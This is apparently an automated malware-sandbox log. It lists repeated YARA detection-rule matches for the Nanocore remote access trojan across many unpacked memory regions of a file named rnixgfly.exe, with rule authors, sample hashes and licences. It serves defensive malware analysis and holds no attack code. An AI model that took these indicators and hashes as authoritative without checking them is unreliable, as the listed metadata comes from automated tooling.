    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
